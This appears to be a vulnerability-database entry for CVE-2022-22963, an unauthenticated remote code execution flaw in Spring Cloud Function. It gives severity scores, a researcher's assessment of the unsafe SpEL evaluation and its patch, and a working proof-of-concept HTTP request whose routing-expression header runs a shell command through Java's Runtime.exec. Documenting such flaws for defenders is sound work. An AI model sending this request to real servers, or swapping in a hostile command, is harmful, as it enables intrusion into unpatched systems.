9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%
In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.
Recent assessments:
zeroSteiner at March 30, 2022 8:46pm UTC reported:
CVE-2022-22963 is an unauthenticated remote code execution vulnerability within Spring Cloud Function prior to 3.1.7 and 3.2.3. This vulnerability should not be confused with the reported 0-day dubbed Spring4Shell that was disclosed at around the same time.
The cause of this vulnerability is an unsafe evaluation context for the Spring Expression Language (SpEL) that can be included in the spring.cloud.function.routing-expression
header. By crafting a POST request with the header, an attacker may execute malicious SpEL queries resulting in code execution in the context of the Spring Cloud Function application.
One early PoC demonstrated that the SpEL query could be used to execute an OS command through the Java Runtime. The following example echos to the /tmp/success
file. It differs from the original by using an array of strings for the arguments passed to exec
. Because the header value is an SpEL query, single quotes should be escaped by doubling them.
POST /functionRouter HTTP/1.1
Host: 192.168.159.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','echo "hello world" >> /tmp/msf-success'})
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
On successful exploitation, the server responds with a 500 error and a JSON response.
HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 153
{"timestamp":"2022-03-30T20:41:28.551+00:00","path":"/functionRouter","status":500,"error":"Internal Server Error","message":"","requestId":"8fed4100-1"}
The response from a server that was patched for the vulnerability (versions 3.1.7 and 3.2.3) is identical.
The vulnerability was patched on March, 29th, 2022 in commit bcb2a25a. The patch adds a second evaluation context and uses it when the SpEL query originates from the HTTP request header. The SimpleEvaluationContext is used when the query originates from a header.
> SimpleEvaluationContext is tailored to support only a subset of the SpEL language syntax, e.g. excluding references to Java types, constructors, and bean references.
Assessed Attacker Value: 3
Assessed Attacker Value: 3Assessed Attacker Value: 5
packetstormsecurity.com/files/173430/Spring-Cloud-3.2.2-Remote-Command-Execution.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963
psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005
tanzu.vmware.com/security/cve-2022-22963
tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH
www.oracle.com/security-alerts/cpuapr2022.html
www.oracle.com/security-alerts/cpujul2022.html
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.975 High
EPSS
Percentile
100.0%